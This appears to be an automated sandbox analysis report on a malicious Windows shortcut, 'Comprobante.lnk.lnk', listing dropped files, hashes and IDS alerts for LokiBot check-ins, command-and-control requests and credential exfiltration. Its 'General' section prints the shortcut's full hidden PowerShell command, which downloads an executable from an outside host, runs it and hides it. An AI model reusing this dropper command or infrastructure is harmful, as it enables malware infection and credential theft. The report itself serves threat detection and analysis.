                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):706
                                                        Entropy (8bit):5.349842958726647
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhav:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhk
                                                        MD5:873FA73F7EAAC5A90DC38988855C5032
                                                        SHA1:694CDB950E35FE9EDBAE22377CBB1630F8F1DB84
                                                        SHA-256:501001FA544E6D1C28EE3BAAAB9CC953E4421AD91222FF68C44CB5BC015D6E02
                                                        SHA-512:3DE429FD9A218A6B491E0D9346A31E9B0418331649452B0AA161452DE6D2DA535AAA3E0FE18FE73B0A7AF77DE7C43DAD77E2C72ADFAC153A1E5EB279FAEB32B0
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                        MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                        SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                        SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                        SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:@...e................................................@..........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\Desktop\mjtjewi.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):371712
                                                        Entropy (8bit):7.854168969155107
                                                        Encrypted:false
                                                        SSDEEP:6144:Mt0VqnKoq12xV+0+LGQ3orU7K9ORPCfQzyI4w2Q8y7tRQG9oeGdwpx6sqyqqQlh4:MIqnJV+3GTQVzZ+MXf6Ex6sqyqqQlhcl
                                                        MD5:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                        SHA1:A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1
                                                        SHA-256:8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70
                                                        SHA-512:8FC3F52D241CD06DB33BCC6FB85564A4FD3EE171E154162B2FB5B1C8E63216CD0F470EBE9DDC1D5E093B4713E1E93DF33D696EED0258D89E3A33B68D47B3CC67
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QA.f............................. ... ... ....@.. .......................@............`.................................$'..W.......8............................................................................ ............... ..H...........j1CM!e^U..... ......................@....text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\mjtjewi.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Users\user\Desktop\mjtjewi.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):46
                                                        Entropy (8bit):0.9390929552354661
                                                        Encrypted:false
                                                        SSDEEP:3:/lbORkn:0en
                                                        MD5:5613DEA7B6F9C4C154D8E228D35F972D
                                                        SHA1:E330C16379E078920136F9FF0E43F865B84E7B13
                                                        SHA-256:6472377665EEE67CA32FB8213E50A5577DC617DB5C53B9D35AAC4DA2C7D0DCEE
                                                        SHA-512:B2DE1CAAE44D8822508F4D00D2824C0749BC8C4D75BBE726D54229F6FDCD218A74EC7B293C5A6069041B5E3133ECF089BA46E763DDD6E448D93F309360E1BE85
                                                        Malicious:false
                                                        Preview:........................................user.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):5353
                                                        Entropy (8bit):3.4068292302060743
                                                        Encrypted:false
                                                        SSDEEP:48:ethGaCvsOcGAVo13m9/SXplxcc7SogZo/KFG9/SXpl+cc7SogZo/c1:eHG6OzmY2QXpMbHeDQXpjbHeW
                                                        MD5:B6C0A170557982613E817965D43EDDD8
                                                        SHA1:153ED0A5BF421C6FB3E44A9B40D891A98343D176
                                                        SHA-256:D88303E92E6BC7DF505D1FA9DD854253821171203FB3931AC4470C1BCFA5B8AF
                                                        SHA-512:D781053E11345E94DA973E2419F2715D11C14A5F759C47F5B48F0EBFAA9CC9E7945D665A96A3913013045BC814532C69B68189C9E93E528FBDB73890CB2DEE60
                                                        Malicious:false
                                                        Preview:...................................FL..................F.`.. ...=FSc|....3.d....r.d................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........z...{.Le|....3.d.....t.2.....CY.: .COMPRO~1.LNK..X......EW*YCY.:..........................'./.C.o.m.p.r.o.b.a.n.t.e...l.n.k...l.n.k.......Y...............-.......X....................C:\Users\user\Desktop\Comprobante.lnk.lnk.. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.p.e.r.f.i.0.0.9...d.a.t.........%SystemRoot%\system32\perfi009.dat..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.p.e.r.f.i.0.0.9...d.a.t........................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):5353
                                                        Entropy (8bit):3.4068292302060743
                                                        Encrypted:false
                                                        SSDEEP:48:ethGaCvsOcGAVo13m9/SXplxcc7SogZo/KFG9/SXpl+cc7SogZo/c1:eHG6OzmY2QXpMbHeDQXpjbHeW
                                                        MD5:B6C0A170557982613E817965D43EDDD8
                                                        SHA1:153ED0A5BF421C6FB3E44A9B40D891A98343D176
                                                        SHA-256:D88303E92E6BC7DF505D1FA9DD854253821171203FB3931AC4470C1BCFA5B8AF
                                                        SHA-512:D781053E11345E94DA973E2419F2715D11C14A5F759C47F5B48F0EBFAA9CC9E7945D665A96A3913013045BC814532C69B68189C9E93E528FBDB73890CB2DEE60
                                                        Malicious:false
                                                        Preview:...................................FL..................F.`.. ...=FSc|....3.d....r.d................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........z...{.Le|....3.d.....t.2.....CY.: .COMPRO~1.LNK..X......EW*YCY.:..........................'./.C.o.m.p.r.o.b.a.n.t.e...l.n.k...l.n.k.......Y...............-.......X....................C:\Users\user\Desktop\Comprobante.lnk.lnk.. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.p.e.r.f.i.0.0.9...d.a.t.........%SystemRoot%\system32\perfi009.dat..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.p.e.r.f.i.0.0.9...d.a.t........................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):371712
                                                        Entropy (8bit):7.854168969155107
                                                        Encrypted:false
                                                        SSDEEP:6144:Mt0VqnKoq12xV+0+LGQ3orU7K9ORPCfQzyI4w2Q8y7tRQG9oeGdwpx6sqyqqQlh4:MIqnJV+3GTQVzZ+MXf6Ex6sqyqqQlhcl
                                                        MD5:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                        SHA1:A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1
                                                        SHA-256:8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70
                                                        SHA-512:8FC3F52D241CD06DB33BCC6FB85564A4FD3EE171E154162B2FB5B1C8E63216CD0F470EBE9DDC1D5E093B4713E1E93DF33D696EED0258D89E3A33B68D47B3CC67
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QA.f............................. ... ... ....@.. .......................@............`.................................$'..W.......8............................................................................ ............... ..H...........j1CM!e^U..... ......................@....text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                        Entropy (8bit):2.8522775336366517
                                                        TrID:
                                                        • Windows Shortcut (20020/1) 100.00%
                                                        File name:Comprobante.lnk.lnk
                                                        File size:2'538 bytes
                                                        MD5:b234c46d1f63b18ad2dc3f824bc0d6fa
                                                        SHA1:fbdcce6b33b9e0ffbba48aadca0db9059af37141
                                                        SHA256:8cd7bd86c1cc1be6d0c553fc3e8e02232b70363fadc3212989b1599a70c668d3
                                                        SHA512:883b59b949966ac9a4b04f51a5298f842b94c80423dec3dd35105c4c61724cde142b7a781a8fab9da32c6748e4d205af7c74f1acd09388f5d19600ac8da97883
                                                        SSDEEP:24:8z/BHYVKVWzO+/CWXHiyQebPE+g1rwpTukQsCXrSZo9ufoYZa4o0oYh5/:8z5a5LE+g1r0qkQL4o96oK
                                                        TLSH:A55124145BFA0320E6F78B3968BAF741897A7C65FE22CB8D0150918C1C75651E871F3B
                                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                        Icon Hash:74f0e4e4e4e1e1ed

                                                        General

                                                        Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Command Line Argument:-ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
                                                        Icon location:c:\windows\system32\perfi009.dat
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-10-03T09:20:32.181025+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164437TCP
                                                        2024-10-03T09:20:32.181025+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164368TCP
                                                        2024-10-03T09:20:32.181025+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164388TCP
                                                        2024-10-03T09:20:32.181025+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1149717TCP
                                                        2024-10-03T09:20:32.181025+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164348TCP
                                                        2024-10-03T09:20:32.181025+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164371TCP
                                                        2024-10-03T09:20:32.181025+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1149718TCP
                                                        2024-10-03T09:20:48.138102+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.114971145.149.241.16980TCP
                                                        2024-10-03T09:20:48.138102+02002025381ET MALWARE LokiBot Checkin1192.168.2.114971145.149.241.16980TCP
                                                        2024-10-03T09:20:48.138102+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.114971145.149.241.16980TCP
                                                        2024-10-03T09:20:49.077565+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.114971145.149.241.16980TCP
                                                        2024-10-03T09:20:49.427132+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.114971245.149.241.16980TCP
                                                        2024-10-03T09:20:49.427132+02002025381ET MALWARE LokiBot Checkin1192.168.2.114971245.149.241.16980TCP
                                                        2024-10-03T09:20:49.427132+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.114971245.149.241.16980TCP
                                                        2024-10-03T09:20:50.285873+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.114971245.149.241.16980TCP
                                                        2024-10-03T09:20:50.395968+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.114971345.149.241.16980TCP
                                                        2024-10-03T09:20:50.395968+02002025381ET MALWARE LokiBot Checkin1192.168.2.114971345.149.241.16980TCP
                                                        2024-10-03T09:20:50.395968+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.114971345.149.241.16980TCP
                                                        2024-10-03T09:20:51.444637+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.114971345.149.241.16980TCP
                                                        2024-10-03T09:20:51.444637+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.114971345.149.241.16980TCP
                                                        2024-10-03T09:20:51.445072+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1149713TCP
                                                        2024-10-03T09:20:52.138116+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.114971445.149.241.16980TCP
                                                        2024-10-03T09:20:52.138116+02002025381ET MALWARE LokiBot Checkin1192.168.2.114971445.149.241.16980TCP
                                                        2024-10-03T09:20:52.138116+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.114971445.149.241.16980TCP
                                                        2024-10-03T09:20:52.895647+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.114971445.149.241.16980TCP
                                                        2024-10-03T09:20:52.895647+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.114971445.149.241.16980TCP
                                                        2024-10-03T09:20:52.900738+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1149714TCP
                                                        2024-10-03T09:20:53.059614+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.114971545.149.241.16980TCP
                                                        2024-10-03T09:20:53.059614+02002025381ET MALWARE LokiBot Checkin1192.168.2.114971545.149.241.16980TCP
                                                        2024-10-03T09:20:53.059614+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.114971545.149.241.16980TCP
                                                        2024-10-03T09:20:55.154508+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.114971545.149.241.16980TCP
                                                        2024-10-03T09:20:55.154508+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.114971545.149.241.16980TCP
                                                        2024-10-03T09:20:55.160370+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1149715TCP
                                                        2024-10-03T09:20:55.313220+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.114971745.149.241.16980TCP
                                                        2024-10-03T09:20:55.313220+02002025381ET MALWARE LokiBot Checkin1192.168.2.114971745.149.241.16980TCP
                                                        2024-10-03T09:20:55.313220+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.114971745.149.241.16980TCP
                                                        2024-10-03T09:20:56.378201+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.114971745.149.241.16980TCP
                                                        2024-10-03T09:20:56.378201+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.114971745.149.241.16980TCP
                                                        2024-10-03T09:20:56.544536+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.114971845.149.241.16980TCP
                                                        2024-10-03T09:20:56.544536+02002025381ET MALWARE LokiBot Checkin1192.168.2.114971845.149.241.16980TCP
                                                        2024-10-03T09:20:56.544536+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.114971845.149.241.16980TCP
                                                        2024-10-03T09:20:57.546571+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.114971845.149.241.16980TCP
                                                        2024-10-03T09:20:57.546571+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.114971845.149.241.16980TCP
                                                        2024-10-03T09:20:58.316168+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.115584345.149.241.16980TCP
                                                        2024-10-03T09:20:58.316168+02002025381ET MALWARE LokiBot Checkin1192.168.2.115584345.149.241.16980TCP
                                                        2024-10-03T09:20:58.316168+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.115584345.149.241.16980TCP
                                                        2024-10-03T09:20:59.117485+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.115584345.149.241.16980TCP
                                                        2024-10-03T09:20:59.117485+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.115584345.149.241.16980TCP
                                                        2024-10-03T09:20:59.122929+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1155843TCP
                                                        2024-10-03T09:20:59.272737+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116434845.149.241.16980TCP
                                                        2024-10-03T09:20:59.272737+02002025381ET MALWARE LokiBot Checkin1192.168.2.116434845.149.241.16980TCP
                                                        2024-10-03T09:20:59.272737+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116434845.149.241.16980TCP
                                                        2024-10-03T09:21:00.355678+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116434845.149.241.16980TCP
                                                        2024-10-03T09:21:00.355678+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116434845.149.241.16980TCP
                                                        2024-10-03T09:21:00.670903+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116435045.149.241.16980TCP
                                                        2024-10-03T09:21:00.670903+02002025381ET MALWARE LokiBot Checkin1192.168.2.116435045.149.241.16980TCP
                                                        2024-10-03T09:21:00.670903+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116435045.149.241.16980TCP
                                                        2024-10-03T09:21:01.453898+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116435045.149.241.16980TCP
                                                        2024-10-03T09:21:01.453898+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116435045.149.241.16980TCP
                                                        2024-10-03T09:21:01.459279+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164350TCP
                                                        2024-10-03T09:21:01.623467+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116435245.149.241.16980TCP
                                                        2024-10-03T09:21:01.623467+02002025381ET MALWARE LokiBot Checkin1192.168.2.116435245.149.241.16980TCP
                                                        2024-10-03T09:21:01.623467+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116435245.149.241.16980TCP
                                                        2024-10-03T09:21:02.292636+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116435245.149.241.16980TCP
                                                        2024-10-03T09:21:02.292636+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116435245.149.241.16980TCP
                                                        2024-10-03T09:21:02.297469+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164352TCP
                                                        2024-10-03T09:21:02.448704+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116435445.149.241.16980TCP
                                                        2024-10-03T09:21:02.448704+02002025381ET MALWARE LokiBot Checkin1192.168.2.116435445.149.241.16980TCP
                                                        2024-10-03T09:21:02.448704+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116435445.149.241.16980TCP
                                                        2024-10-03T09:21:03.191952+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116435445.149.241.16980TCP
                                                        2024-10-03T09:21:03.191952+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116435445.149.241.16980TCP
                                                        2024-10-03T09:21:03.202516+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164354TCP
                                                        2024-10-03T09:21:03.488048+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116435545.149.241.16980TCP
                                                        2024-10-03T09:21:03.488048+02002025381ET MALWARE LokiBot Checkin1192.168.2.116435545.149.241.16980TCP
                                                        2024-10-03T09:21:03.488048+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116435545.149.241.16980TCP
                                                        2024-10-03T09:21:04.262865+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116435545.149.241.16980TCP
                                                        2024-10-03T09:21:04.262865+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116435545.149.241.16980TCP
                                                        2024-10-03T09:21:04.268373+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164355TCP
                                                        2024-10-03T09:21:04.428362+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116435745.149.241.16980TCP
                                                        2024-10-03T09:21:04.428362+02002025381ET MALWARE LokiBot Checkin1192.168.2.116435745.149.241.16980TCP
                                                        2024-10-03T09:21:04.428362+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116435745.149.241.16980TCP
                                                        2024-10-03T09:21:05.200763+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116435745.149.241.16980TCP
                                                        2024-10-03T09:21:05.200763+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116435745.149.241.16980TCP
                                                        2024-10-03T09:21:05.205632+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164357TCP
                                                        2024-10-03T09:21:05.363793+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116435845.149.241.16980TCP
                                                        2024-10-03T09:21:05.363793+02002025381ET MALWARE LokiBot Checkin1192.168.2.116435845.149.241.16980TCP
                                                        2024-10-03T09:21:05.363793+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116435845.149.241.16980TCP
                                                        2024-10-03T09:21:06.209342+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116435845.149.241.16980TCP
                                                        2024-10-03T09:21:06.209342+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116435845.149.241.16980TCP
                                                        2024-10-03T09:21:06.216904+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164358TCP
                                                        2024-10-03T09:21:06.386274+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116435945.149.241.16980TCP
                                                        2024-10-03T09:21:06.386274+02002025381ET MALWARE LokiBot Checkin1192.168.2.116435945.149.241.16980TCP
                                                        2024-10-03T09:21:06.386274+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116435945.149.241.16980TCP
                                                        2024-10-03T09:21:07.095755+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116435945.149.241.16980TCP
                                                        2024-10-03T09:21:07.095755+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116435945.149.241.16980TCP
                                                        2024-10-03T09:21:07.101687+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164359TCP
                                                        2024-10-03T09:21:07.265208+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116436045.149.241.16980TCP
                                                        2024-10-03T09:21:07.265208+02002025381ET MALWARE LokiBot Checkin1192.168.2.116436045.149.241.16980TCP
                                                        2024-10-03T09:21:07.265208+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116436045.149.241.16980TCP
                                                        2024-10-03T09:21:08.058000+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116436045.149.241.16980TCP
                                                        2024-10-03T09:21:08.058000+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116436045.149.241.16980TCP
                                                        2024-10-03T09:21:08.062889+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164360TCP
                                                        2024-10-03T09:21:08.224949+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116436145.149.241.16980TCP
                                                        2024-10-03T09:21:08.224949+02002025381ET MALWARE LokiBot Checkin1192.168.2.116436145.149.241.16980TCP
                                                        2024-10-03T09:21:08.224949+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116436145.149.241.16980TCP
                                                        2024-10-03T09:21:08.908970+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116436145.149.241.16980TCP
                                                        2024-10-03T09:21:08.908970+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116436145.149.241.16980TCP
                                                        2024-10-03T09:21:08.918941+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164361TCP
                                                        2024-10-03T09:21:09.172629+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116436245.149.241.16980TCP
                                                        2024-10-03T09:21:09.172629+02002025381ET MALWARE LokiBot Checkin1192.168.2.116436245.149.241.16980TCP
                                                        2024-10-03T09:21:09.172629+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116436245.149.241.16980TCP
                                                        2024-10-03T09:21:09.839583+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116436245.149.241.16980TCP
                                                        2024-10-03T09:21:09.839583+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116436245.149.241.16980TCP
                                                        2024-10-03T09:21:09.844424+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164362TCP
                                                        2024-10-03T09:21:09.997521+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116436345.149.241.16980TCP
                                                        2024-10-03T09:21:09.997521+02002025381ET MALWARE LokiBot Checkin1192.168.2.116436345.149.241.16980TCP
                                                        2024-10-03T09:21:09.997521+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116436345.149.241.16980TCP
                                                        2024-10-03T09:21:10.836642+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116436345.149.241.16980TCP
                                                        2024-10-03T09:21:10.836642+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116436345.149.241.16980TCP
                                                        2024-10-03T09:21:10.841978+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164363TCP
